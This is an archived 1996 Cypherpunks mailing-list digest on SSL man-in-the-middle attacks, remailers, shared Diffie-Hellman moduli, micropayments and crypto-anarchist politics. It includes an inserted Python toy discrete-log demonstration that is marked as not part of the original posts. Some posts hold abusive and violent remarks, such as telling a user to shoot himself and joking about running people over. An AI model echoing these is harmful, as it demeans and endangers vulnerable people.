From snow at smoke.suba.com Mon Sep 9 20:05:52 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 11:05:52 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > Stephan Schmidt writes: > > One thought : How many of you would support terrorist > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > http://www.terrorist.org ? smoke:~> whois terrorist.org [rs.internic.net] Terrorist Organization (TERRORIST2-DOM) 1525 SW 14th #4 Portland, OR 97201 US Domain Name: TERRORIST.ORG Administrative Contact, Technical Contact, Zone Contact, Billing Contact: Sievert, Jerry (JS651) jerrys at E-Z.NET 360-260-1122 Record last updated on 26-Jun-96. Record created on 26-Jun-96. Domain servers in listed order: E-ZONE.E-Z.NET 205.240.28.1 NS1.IXA.NET 199.242.16.1 The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Petro, Christopher C. petro at suba.com snow at smoke.suba.com From roy at sendai.scytale.com Mon Sep 9 20:19:36 1996 From: roy at sendai.scytale.com (Roy M. Silvernail) Date: Tue, 10 Sep 1996 11:19:36 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) In-Reply-To: <199609091748.NAA27475@attrh1.attrh.att.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In your mail, you write: > At 01:03 PM 9/7/96 CST, roy at scytale.com wrote: > >Can Telecards be audited for usage? If a TLA black-bags my $25 Telecard > >from my wallet, can they reconstruct what calls I made with it? > > Easily. They get the card number off the card, and then check their > long distance records for calls made with that card number. I thought as much. Does the audit trail extend to local calls too? (I suspect it does) - -- Roy M. 
Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjSZvxvikii9febJAQHdLQP8DA/xxhnKNZOUex5dp/P4kRgLbgS9HryO tuR5G4eCnjJsuANxuzuUFrjoRm8jknIOhdnrubcK1fxPwInJdMqWbJ8WDPyJcoCf 5jq4ePpahMa2VUbZRoFOwN86n25l0DHHK8lsWpDQ8y8pg/zqToEyLiUJTUi+RID6 HC5eltYmMJc= =uj3L -----END PGP SIGNATURE----- From nexus at adv.es Mon Sep 9 20:28:32 1996 From: nexus at adv.es (I~nigo Gonzalez) Date: Tue, 10 Sep 1996 11:28:32 +0800 Subject: Can you trust your ISP ?? Message-ID: <3234A158.3492@adv.es> Hello, I'm thinking about how can I get rid off this kind of attack *before* it happens. Can you please send me your comments about this? I don't know so much about the how SSL works, but I think this is something that can happen... SCENARIO -------- 1) Suppose We have a host with https protocol enabled, and someone outside wish to access the information we have on the server via https; but (for some reason wich we don't know), the connection has to be made through the Gateway named X (see plain diagram below): Outside <-------------> Gateway X <---------------> Our Server 2) I think that when a Secure Socket Layer connection begin this is what it happens: a) Outside generates a private/public key pair and he send us his public key, wich has to go through Gateway X, who send it to Our Server. b) Our Server generates his own private/public key pair and send his public key (whether it's sent ciphered or not doesn't matter... yet). c) Now both parts have their response public keys, ciphered transaction begins. All seems to be fine, but... 
3) Suppose that we don't trust what's going on through the line, and that IN FACT, someone in Gateway X is disturbing our communications like this:

   a) When Outside's public key comes to the gateway, Gateway X generates a public/private key pair (which we will call spoofed keys), and it sends a spoofed IP header marked as from "Outside" in order to act as "Outside" for "Our Server".

   b) Once "Our Server" sends his public key, "Gateway X" intercepts the packet, decrypts it if necessary (because it has the private key needed to decrypt it), and it sends "Outside" the public spoofed key (remember what it did on step a?).

   c) Now the transaction takes place through "Gateway X", which can read, modify, and fake any data because it now has the ability to act as the other side to both "Outside" and "Our Server"...

Avoid the problem:

 - The *only* thing I can figure out to avoid the menace is to have a certified (Verisign and others) public key with a short expiration date. Of course this approach has a little problem: *how* can I verify that once expired "Our Server's" public key is really "Our Server's" key... a Certification Authority is something worth spoofing... ;-) Maybe the best thing could be becoming my own certification authority... but how!?

   If for *some* reason the above cannot be done, then a simple way to avoid too much trouble is to limit transactions to just *atomic* transactions (checking account and getting some money are two different transactions). This can still be spoofed if "Gateway X" makes its own transaction with faked Outside's keys. Of course, we must limit the transactions we accept in "Our Server". Notice that a password and challenges are useless in this kind of situation.

¿Any other way?
Maybe we can get something a bit safer if we found something fixed, immutable and rely on it (acting like some kind of virtual communication channel between Outside and Our Server):

                       Untrusted
Outside <-------------> Gateway X <---------------> Our Server
   ^                                                    ^
   |                                                    |
   \-------- Virtual secure communication channel -------/

If every message "Outside" sends to "Our Server" must have a response, then we could make "Our Server" send responses with some good (well thought) cryptographic technique which will refer somehow to "Outside's" message fingerprint. I mean, every message from the Outside must have a message signature (i.e. the message must pass through MD5); and its response must have a valid "Response to: " and (of course) that response must be signed somehow. I still don't know how to do it well; but I will tell you how as soon as I know.

Thank you for wasting your time reading this.

-- Iñigo González - ADV Internet Technical Advisor
"Never say anything online that you wouldn't want to see on the front page of The New York Times." - alt.2600.moderated Posting

From pjn at nworks.com Mon Sep 9 20:31:51 1996
From: pjn at nworks.com (pjn at nworks.com)
Date: Tue, 10 Sep 1996 11:31:51 +0800
Subject: talker [is illiterate
Message-ID:

In> = You know man I am a profesional so don't reply to me
In> = as a novice or anything. I have been doing this since I
In> = wuz 12. And I'm not young for my age I know alot
In> = about hacking and FYI there's alot you could learn from
In> = me so don't think 23 is a young age pal.
In> =
In> = Doom13
In> =

Listen you little juno-using twit... I have been hacking (Yes, the Electronic B&E type of hacking) since before you were a twinkle in the mailman's eye... YOU want to learn something? Sit on your ass, and read... Don't waste mailbot space with the crap you write...

P.J. pjn at nworks.com

... Eliminate spare time - buy a modem!
___ Blue Wave/QWK v2.20 [NR] From pjn at nworks.com Mon Sep 9 20:37:05 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Tue, 10 Sep 1996 11:37:05 +0800 Subject: talker Message-ID: The shitless fake hacker doom13 tried to say: > I am doom13. If there is anyone out there who is a hacker or >would like to be one you can talk to me and find out stuff like cracking. >Just drop a message at doom13 at juno.com. In> Hmmmm... Want to bet our other friend at juno.com sent him? I might In> just end up killfiling juno.com... Obviously a low-IQ area of the net. Its not low IQ... Its non-existant... It is a free E-Mail group, you dont pay, but you have to look at ads... P.J. pjn at nworks.com ... I would rather be judged by twelve then carried by six. ___ Blue Wave/QWK v2.20 [NR] From pjn at nworks.com Mon Sep 9 20:37:13 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Tue, 10 Sep 1996 11:37:13 +0800 Subject: Church of Scientology Message-ID: In> Scuttlebut is, CoS rolled over on some pesky ultra-right-wingers as a In> favor to Morris Dees and various scumbag associates. For this, CoS got In> their long-awaited (40-plus years!) federal tax-free status. I think, after their part in the closing of anon.penet.fi, some people should RUN over some CoS members... :) P.J. pjn at nworks.com ... "Bother," said Pooh, as he was assimilated by the Borg. ___ Blue Wave/QWK v2.20 [NR] From zachb at netcom.com Mon Sep 9 20:41:45 1996 From: zachb at netcom.com (Z.B.) Date: Tue, 10 Sep 1996 11:41:45 +0800 Subject: Followup to 9/1 Observer article printed Message-ID: Found this on alt.privacy today: Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 --- From: naughty at scallywag.com (Naughty Boy) Newsgroups: alt.privacy Subject: READ TODAY'S OBSERVER ARTICLE - THEY SINK TO THEIR TRUE LEVEL! 
Date: Sun, 08 Sep 1996 20:36:47 GMT Organization: Scallywags of the World Lines: 20 Message-ID: <32332e5c.4219376 at news.u-net.com> NNTP-Posting-Host: host3.animal.u-net.com X-Newsreader: Forte Agent .99e/32.227 READ TODAY'S OBSERVER ARTICLE - THEY SINK TO THEIR TRUE LEVEL! Today, September 8, the Observer publish a follow-up-follow-up article for their amazing "child porn" expose which so grossly libelled Clive Feather and Johan Helsingius ... a review of the "first" toddler CD-ROM... How have the mighty crusaders fallen ! Sic transit gloria mundi.... Actually, the Observer new technology reporters may have found their true niche at last - it's a bit egotistic for the reporter to print such a large picture of himself, though ! Read it all at http://www.scallywag.com PS: Private Eye published an intelligent and amusing commentary on this whole sorry business recently, and scallywag.com will post it, but, in deference to PE, not until the current issue goes off sale. NAUGHTY BOY (The Scallywag) From sevoy at sunnyside.com Mon Sep 9 20:42:09 1996 From: sevoy at sunnyside.com (Susan Evoy) Date: Tue, 10 Sep 1996 11:42:09 +0800 Subject: Zimmermann gets CPSR's Wiener Award Message-ID: <199609091905.MAA18397@snyside.sunnyside.com> * * NEWS ADVISORY * * FOR IMMEDIATE RELEASE August 22, 1996 --------------------- Contact: Computer Professionals for Social Responsibility Duane Fickeisen, Interim Director Phone: 415-322-3778 E-mail: dfickeisen at cpsr.org Phil Zimmermann, controversial inventor of Pretty Good Privacy (PGP), earned the prestigious Norbert Wiener Award of 1996. The Wiener award is for excellence in promoting the responsible use of technology and is given annually by Computer Professionals for Social Responsibility (CPSR). The award will be presented by CPSR board member Nathaniel Borenstein at CPSR's annual meeting on October 19-20, 1996 at Georgetown University in Washington, DC. 
The award to Zimmermann is related to the theme of the conference, "Communications Unleashed: What's At Stake? Who Benefits? How to Get Involved!," which focuses on the public interest in stewardship of the dazzling array of emerging communications services and issues related to free speech, copyright protection, and privacy online. CPSR is a public-interest alliance of computer scientists and others interested in the impact of computer technology on society. CPSR attempts to direct public attention to difficult choices concerning the applications of computing and how those choices affect society. According to CPSR Interim Director Duane Fickeisen, PGP brings critical privacy issues to public attention, because PGP allows the average person to encode his or her email so only the receiver can read and understand it. Until PGP came along, only governments or large corporations could make their email secure. In computer jargon, PGP is a "public-key encryption software." Zimmermann, 42, created PGP and published it in the U.S.A. as "freeware" (free software) in June of 1991. Since its creation, PGP has spread all over the world, and has since become the de facto worldwide standard for encryption of email. Controversy came with government attempts to control encryption. For three years Zimmermann was the target of a criminal investigation by the US Customs Service, who assumed that laws were broken when PGP spread outside the US. That investigation was closed without indictment in January 1996. Zimmermann wrote PGP from information in the open literature, putting it into a convenient package that everyone can use in a desktop or palmtop computer. "I gave it away for free, for the good of democracy. This technology belongs to everybody," he says. According to Zimmermann, the recent strides in electronic digital communication brought with them a "disturbing erosion of our privacy. 
In the past, if the government wanted to violate the privacy of ordinary citizens, it had to expend a certain amount of effort to intercept and steam open and read paper mail, and listen to and possibly transcribe spoken telephone conversation. This is analogous to catching fish with a hook and a line, one fish at a time. Fortunately for freedom and democracy, this kind of labor-intensive monitoring is not practical on a large scale." Today, human rights organizations such as Amnesty International are using PGP to protect their people overseas. "PGP has spread like a prairie fire, fanned by countless people who fervently want their privacy restored in the information age," says Zimmermann. Unfortunately, email messages are too easy to intercept and scan for interesting keywords, such as "revolution" or "abortion." This "fishing" can be done routinely and invisibly on a grand scale. When most of the population becomes reliant on email, the government will be able to do "driftnet fishing" -- making a quantitative and qualitative Orwellian difference to the health of democracy, Zimmermann said. Law enforcement and intelligence interests in the government have attempted many times to suppress the availability of strong domestic encryption technology. However, Zimmermann doubts their chances for success. He says, "The rest of the world uses encryption and they laugh at the US because we are railing against nature, trying to stop encoding messages. Trying to stop this is like the buggy whip manufacturers trying to stop the adoption of cars -- even with the NSA and the FBI on the government side, it's still impossible. The information revolution is good for democracy -- good for a free market and trade." "The government has a track record that does not inspire confidence that they will never abuse our civil liberties," says Zimmermann, who is now Chairman of the Board and Chief Technology Officer for Pretty Good Privacy, Inc. (PGP). 
For more information on the conference or the Wiener Award, contact CPSR at 415-322-3778, 703-739-9320, cpsrannmtg at cpsr.org, http://www.cpsr.org/home.html. -- Susan Evoy * Deputy Director http://www.cpsr.org/home.html Computer Professionals for Social Responsibility P.O. Box 717 * Palo Alto * CA * 94302 Phone: (415) 322-3778 * Fax: (415) 322-4748 * Email: evoy at cpsr.org * From perry at piermont.com Mon Sep 9 20:45:33 1996 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 10 Sep 1996 11:45:33 +0800 Subject: Imminent Death of the Internet, GIF at 11 In-Reply-To: Message-ID: <199609092203.SAA25379@jekyll.piermont.com> Simon Spero writes: > Remember, though - TCPs initial estimate of the congestion window is > never less than one packet, large numbers of opening connections can > still (I think) lead to congestion collapse. It can defnitely get close > to it. Sure. TCP, especially without SACK but even with such schemes, more or less requires an average of no less than one packet per RTT. However, the other half of what I said is that bandwidth *is* rising. Perry From pjn at nworks.com Mon Sep 9 20:48:23 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Tue, 10 Sep 1996 11:48:23 +0800 Subject: Message-ID: -=> Quoting Int:snow at smoke.suba.com to P.j. <=- In> On Thu, 5 Sep 1996 pjn at nworks.com wrote: > In> what do you know about hackers > > More than you appariently... > In> Which isn't necessarily all that much. Not for him... P.J. pjn at nworks.com ... Be wary of strong drink. It can make you shoot at tax collectors and m ___ Blue Wave/QWK v2.20 [NR] From pjn at nworks.com Mon Sep 9 20:59:41 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Tue, 10 Sep 1996 11:59:41 +0800 Subject: /\/\/\/\/HELP\/\/\/\/\ ! Message-ID: In> I really need help unsubscribing from the Cypherpunks list! it is In> imperative! Just shoot yourself and it will all go away. . . P.J. pjn at nworks.com ... Exercise your right to arm and keep bears! 
___ Blue Wave/QWK v2.20 [NR] From frantz at netcom.com Mon Sep 9 21:00:58 1996 From: frantz at netcom.com (Bill Frantz) Date: Tue, 10 Sep 1996 12:00:58 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailer protocols) Message-ID: <199609092316.QAA24498@netcom6.netcom.com> On Sun, 8 Sep 1996, Lance Cottrell wrote: > Mixmaster prevents replay, so flooding multiple copies of a single message > will not work. This is the reason Mixmaster has no reply block feature. I > can see two ways in which replies can work safely. To paraphrase John Von Neumann, any system which uses reply blocks is in a state of sin. By this I mean that if there is a chain pointing at you, a sufficiently powerful attacker can walk down that chain and find you. Given that, I will join the state of sin by proposing a mechanism which will allow Alice to receive a reply from Bob, but change her mind at any time. The basic idea is to have a one-time reply block which either Bob or Alice can send to. If Alice thinks that too much time has elapsed, and powerful enemies are walking down her reply block chain, she can send herself a reply and break the chain. (She might send a reply thru each link in the chain to break all the links.) It also occurs to me that since email addresses are about the same size as secure symmetric keys, it would be attractive to use real one time pads instead of symmetric key cyphers for encrypting them. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From tcmay at got.net Mon Sep 9 21:20:47 1996 From: tcmay at got.net (Timothy C. 
May) Date: Tue, 10 Sep 1996 12:20:47 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: At 6:16 PM 9/9/96, snow wrote: > Then again, the only reason I am not a terrorist is that the government >hasn't YET defined hate speach directed against the government to be >terrorism. Don't be so hasty in saying this. A couple of months ago Clinton signed some sort of bill having to do with terrorism, terrorist organizations, funding of same, and deportation of alien-units suspected of being allied with terrorist organizations. (I seem to recall another such act being passed in early 1995, so there may be more than one of these things...) Given the mounting hysteria about terrorism (by the government, at least), and given the various laws on the books, I would not be surprised to see some Web sites prosecuted as "harboring" terrorists terrorist-symps. If any of you are not citizens of the U.S., and are here on visas, I would give this some real serious thought. Of course, maybe deportation is a blessing in disguise. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From erehwon at c2.net Mon Sep 9 21:23:28 1996 From: erehwon at c2.net (William Knowles) Date: Tue, 10 Sep 1996 12:23:28 +0800 Subject: Yahoo!'s Picks of the Week (September 9, 1996) In-Reply-To: Message-ID: Did anyone else catch this one? > Welcome to this week's selection of Picks, declassified and hot off > the press thanks to the Freedom of Information Act. Well, okay, not > really. But we like to pretend. 
On the other hand, if you would like > to peruse what once was private but now is public (in a federal > government sense of the word), head on over to The National Security > Archive. An independent, non-governmental research institute and > library, the NSArchive is where you'll find declassified > U.S. documents that shed light on anything from the Nixon-Presley > Meeting (Elvis wanted to be a Federal Agent at Large!) to the Cuban > Missile Crisis and a handful of White House e-mail in-between. > > http://www.seas.gwu.edu/nsarchive/ William Knowles erehwon at c2.net -- William Knowles PGP mail welcome & prefered / KeyID 1024/2C34BCF9 PGP Fingerprint 55 0C 78 3C C9 C4 44 DE 5A 3C B4 60 9C 00 FB BD Finger for public key -- Vote Harry Browne for President -- http://www.HarryBrowne96.org From drose at AZStarNet.com Mon Sep 9 22:12:04 1996 From: drose at AZStarNet.com (David M. Rose) Date: Tue, 10 Sep 1996 13:12:04 +0800 Subject: ... subversive leftists Message-ID: <199609100157.SAA12409@web.azstarnet.com> Tim May wrote: >As to the "Reichskommander," in our country, and on the Net, such jokes are >not illegal. I rather suspect they are in Germany, either the DDR or the >Western side. > >As to "tasteless and insulting," a matter of personal perspective. I find >it helpful to call a spade a spade, and others apparently do as well. Ja, Ja. Das ist gut. Ve make chust a little choke now. VERE ARE YOUR PAPERSS!? ___ David M. Rose "Theft is...a heinous crime, property representing as it does a goodly proportion of a man's life-effort: ergo, his vital force. Property is life; ...do not steal". --J.H. Vance From ericm at lne.com Mon Sep 9 22:28:23 1996 From: ericm at lne.com (Eric Murray) Date: Tue, 10 Sep 1996 13:28:23 +0800 Subject: BoS: Can you trust your ISP ?? In-Reply-To: <3234A158.3492@adv.es> Message-ID: <199609100149.SAA16682@slack.lne.com> I~nigo Gonzalez writes: > > Hello, > I'm thinking about how can I get rid off this kind of attack *before* it > happens. 
Can you please send me your comments about this? I don't know so > much about the how SSL works, but I think this is something that can > happen... [classic Man-in-the-Middle attack] What you described is the Man In The Middle attack, often abbreviated on these lists as MITM. The fact that there's an abbreviation for it should indicate to you how often it is discussed. However it's also one of the first problems (besides the basic encryption) that protocol designers think of. It's been taken care of in SSL3- the server's certificate must be signed by a CA that the client trusts. Unless the digital signature can be spoofed, and it probably can't be, the client can be certain that the server certificate it got is really from the server that it claims to be from. Assuming that RSA still can't be broken, the client can be sure that the pre-master-key material that it sends to the server (and which is the basis for the symmetric crypto session keys) will not be compromised. If you grab a copy of the SSL3 spec (from netscape's web site) and read the appendicies there's more good stuff about possible attacks and what's been done to counter them. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm Principal, LNE Consulting: SSL, crypto applications, Internet security. PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From smith at sctc.com Mon Sep 9 22:32:26 1996 From: smith at sctc.com (Rick Smith) Date: Tue, 10 Sep 1996 13:32:26 +0800 Subject: Conservation Laws, Money, Engines, and Ontology Message-ID: <199609092229.RAA16420@shade.sctc.com> Wouldn't the model fit reality better if it were based on biological analogies instead of the raw physics of energy? I recognize there's a desire here to put some controls on one's own equipment ("I don't want to receive spam if I don't want to") and that physics provides the conceptual lever to argue in favor of the desired controls. 
Biological systems are a poor choice for grained control by people who like to change their minds. But the Internet really is more like an ecology with its own complex notion of "emergent order" than a simple physical process that must obey conservation laws in some narrow fashion. Trees obey physical conservation laws, but they don't exchange micropayments with soil, air, and Sun to ensure the balance is preserved. As things get out of balance, trees die. Other entities flourish. I can't imagine the mechanism by which very precise access charging and cost recovery mechanisms would replace the current "free" model. As we all know, it's not really "free." Information is published and made available because the vendor needs to distribute it and finds the Internet to be a cheap way to make it available. Many vendors exchange information and entertainment for your attention to a commercial message. As long as there are unmetered 'Net resources (and they're unmetered for a plethora of reasons) you'll never get rid of free riders. I think you have to choose between the relatively lawless open world or an enclave where you bar the door with your favorite security measures. You allow spam as long as you allow uninvited guests. And what is cypherpunks but a continuous party of uninvited guests? Regarding these micropayment machines, I think it would be interesting to identify some existing, widely used, real world analogues to them: how big/small are individual transactions, how much money can you securely collect, how much does the mechanism cost to deploy and maintain, how hard is it to attack, etc. Gumball machines? Pop machines? Pay phones? I'm not sure there *is* a real world analogue. Rick. smith at sctc.com secure computing corporation From tcmay at got.net Mon Sep 9 22:33:59 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 13:33:59 +0800 Subject: Terrorists Message-ID: At 6:29 PM 9/9/96, Duncan Frissell wrote: >At 01:49 AM 9/9/96 -0700, Timothy C. 
May wrote: >>And the net effect of crypto anarchy is to destabilize and marginalize >>central governments, which is a net positive effect. If some eggs get >>broken in the process, the biological imperative will generate more eggs. >>No big deal. > >Particularly since governments murdered 160 million in the last 100 years >while we civilians have only managed to murder a paltry 20 million or fewer. >A savings of 160 million deaths leaves a lot of room for a non-harmful >increase in private murder. We could increase the private murder rate by 8 >to 10 times and still break even. > >Note too that most terrorism is aimed at governments (even if practiced on >civilians). In the absence of government, terrorist incentives may be reduced. Remember, folks, it is _governments_ which interfere with natural movements of people, capital, but not birds. I don't want to jeopardize my reputation as a List.Racist, but I think one of the longterm (not in the next 15 years) implications of the things we talk about will be the increased lowering of national borders. (Yes, I have long talked about national borders being only speed bumps...here I'm talking about _physical_ borders.) Some good insights into the "border issue" are in the current movie "Lone Star." See it to appreciate things from a Mexican's perspective, when Texas is viewed as being essentially Mexican. (Some great humor, too. And a good murder mystery. And a love story. Conspiracy, humor, murder, love...all the ingredients of a great story. All three major American races collide, and mix. No role for Asians, though. Another movie...maybe a Wayne Wang movie.) ("Lone Star" is this year's "Pulp Fiction," just as "Usual Suspects" was last year's "Pulp Fiction.") Crypto anarchy means the undermining of governments, and hence handouts to people by government. People will only move physically for physical jobs, and not for handouts. People will flow to where the jobs are, and jobs will flow to where the people are. 
Isn't this what we really want?

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From ghio at c2.net Mon Sep 9 22:35:37 1996
From: ghio at c2.net (Matthew Ghio)
Date: Tue, 10 Sep 1996 13:35:37 +0800
Subject: forward secrecy in mixmaster
In-Reply-To:
Message-ID: <199609100232.TAA22069@infinity.c2.org>

Lance Cottrell wrote:
> Our options will open up a lot when the patent expires next year.
> I agree it does not make much difference mathematically, but one DH modulus
> always makes me uneasy. DH is still patented though. I think I will continue
> to use RSAREF, but compose the standard so the protocol supports unlimited
> key sizes.

RSAREF does not give you a license to use DH because RSA does not have a licence to use DH. So basically you can use whatever library you want and it doesn't change your position legally.

I believe I read that in the Schlafly-RSA-Cylink lawsuit, the judge issued an injunction barring Cylink from suing anyone else for patent infringement until the current case is resolved. The judge will probably throw out the patent - Anyone know when the next hearing in this case is?

Mathematically, a common modulus does make a difference, because you can do precomputations on the modulus. This generally involves finding the discrete logarithms of many small primes modulo p. For example, if you solved (by exhaustive search) the values of a,b,c,d,e... such that, mod p, g^a=2, g^b=3, g^c=5, g^d=7, g^e=11, and so on, then you could compute the discrete logs of larger numbers by factoring them into small primes. For example, if you wanted to take the discrete log of, oh, say, 339570, that would be a+2b+c+3d+e, since 339570=2*(3^2)*5*(7^3)*11. The logarithm of a product is the sum of the logarithms of the factors.

What happens if you want to take the discrete log of a number you can't factor? Let's suppose you want the discrete log of 257. Well, you can't factor that because it's prime. But, since we're working modulo p, 257=p+257. So you can try factoring p+257, or 2p+257, or 3p+257, etc. until you find a number that factors nicely into some combination of the primes that you do have. Of course, the more small primes you collect, the easier it is to find such numbers, thus the more small primes you collect, the easier it is to find more small primes. :)

In light of the above, it should be apparent that users should not share a common modulus, even if they use different generators (you can take the discrete log of one generator to the other, once you crack one of them). Thus it is wise for each user to create their own prime number modulus before they generate their key.

Oh, one final thing - (actually two final things) - If the modulus is not prime, and the attacker can factor the modulus, then the discrete log problem becomes somewhat easier because of the Chinese Remainder Theorem. Also, the ability to do arbitrary discrete logs modulo p, where p is a product and not prime, implies the ability to factor p. (Think about it for awhile. ;-) Overall tho, the discrete log problem is believed to be slightly harder than factoring.
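Added example, not part of Matthew Ghio's message or of any code posted to the list: the small-prime precomputation he describes, run against a toy shared modulus. The prime P = 1000003, the function names and the second generator g2 are assumptions of this sketch; where the message retries h+p, h+2p, ..., the code uses the common variant of multiplying h by powers of g so that candidates stay below p.

```python
# Constructed toy parameters; real DH moduli are thousands of bits long.
P = 1000003                      # prime modulus shared by every user
FACTOR_BASE = (2, 3, 5, 7, 11)   # the small primes used in the message


def prime_factors(n):
    """Distinct prime factors of n by trial division (fine at toy size)."""
    out, d = [], 2
    while d * d <= n:
        if n % d == 0:
            out.append(d)
            while n % d == 0:
                n //= d
        d += 1
    if n > 1:
        out.append(n)
    return out


def generators(p, count):
    """Smallest `count` generators of the multiplicative group mod prime p."""
    qs, found, g = prime_factors(p - 1), [], 2
    while len(found) < count:
        if all(pow(g, (p - 1) // q, p) != 1 for q in qs):
            found.append(g)
        g += 1
    return found


def precompute_base_logs(p, g, base=FACTOR_BASE):
    """Once per modulus: exhaustive search for log_g of every small prime."""
    wanted, logs, value = set(base), {}, 1
    for x in range(p - 1):
        if value in wanted:
            logs[value] = x
            if len(logs) == len(wanted):
                break
        value = value * g % p
    return logs


def smooth_exponents(n, base=FACTOR_BASE):
    """Exponents of n over the factor base, or None if n is not smooth."""
    if n < 1:
        return None
    exps = []
    for q in base:
        e = 0
        while n % q == 0:
            n //= q
            e += 1
        exps.append(e)
    return exps if n == 1 else None


def discrete_log(h, p, g, logs, base=FACTOR_BASE):
    """Return (log_g(h) mod p-1, candidates tried) using only the table.

    Candidate k is h * g^k mod p. When it factors over the base,
    log(h) = sum(e_i * log(q_i)) - k  (mod p-1).
    """
    candidate = h % p
    if candidate == 0:
        raise ValueError("0 has no discrete logarithm")
    for k in range(p - 1):
        exps = smooth_exponents(candidate, base)
        if exps is not None:
            total = sum(e * logs[q] for e, q in zip(exps, base))
            return (total - k) % (p - 1), k + 1
        candidate = candidate * g % p
    raise ValueError("no smooth candidate found")


def change_base(log_h, log_g2, p):
    """Turn log_g(h) into log_g2(h), given log_g(g2); g2 must be a generator."""
    return log_h * pow(log_g2, -1, p - 1) % (p - 1)


def demo():
    g, g2 = generators(P, 2)              # two users, two generators, one P
    logs = precompute_base_logs(P, g)     # the expensive, reusable step
    # 339570 = 2 * 3^2 * 5 * 7^3 * 11, so its log is a + 2b + c + 3d + e.
    log_smooth, tries_smooth = discrete_log(339570, P, g, logs)
    # 257 is prime and outside the base, so other representatives are tried.
    log_257, tries_257 = discrete_log(257, P, g, logs)
    # The table for g also answers questions about the other user's g2.
    log_g2, _ = discrete_log(g2, P, g, logs)
    return {
        "g": g, "g2": g2, "base_logs": logs,
        "log_339570": log_smooth, "tries_339570": tries_smooth,
        "log_257": log_257, "tries_257": tries_257,
        "log_257_base_g2": change_base(log_257, log_g2, P),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The `tries_*` fields count the candidates factored per target once the table exists; the table itself is built once per modulus and reused for every key under it, which is the reason the message gives for not sharing a modulus.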
From sophi at best.com Mon Sep 9 22:41:57 1996 From: sophi at best.com (Greg Kucharo) Date: Tue, 10 Sep 1996 13:41:57 +0800 Subject: Conservation Laws, Money, Engines, and Ontology Message-ID: <199609100236.TAA25621@dns2.noc.best.net> >The most basic principle is this: those with resources they control (and >"own") set the rates and policies. I assume you mean this applies to both parties. The ISP has resources that I want to purchase. I have monetary resources it wants in return. Here's an idea; a contract socket. This socket negotiates a info exchange deal based on a base of variables that you have programmed it with. The exchange is made and money changes hands. Build in the usual things like reputation checking and what not to verify that the other guy meets the variables outlined(or at least can be trusted to). ??????????????????????????????????????? Greg Kucharo sophi at best.com "Eppur si moeve" -Galileo ??????????????????????????????????????? From dlv at bwalk.dm.com Mon Sep 9 23:16:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 14:16:08 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: Message-ID: <0DR1TD79w165w@bwalk.dm.com> snow writes: > On Mon, 9 Sep 1996, Stephan Schmidt wrote: > > > One thought : How many of you would support terrorist > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > If Iran, the IRA, etc. wanted to pay me to host a web page that > described their goals and methods, I would. > > I believe in free speach, and that means even if I disagree. > > Then again, the only reason I am not a terrorist is that the government > hasn't YET defined hate speach directed against the government to be > terrorism. You're not talking about the fascist U.S. gubment, are you? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Mon Sep 9 23:19:02 1996 From: tcmay at got.net (Timothy C. 
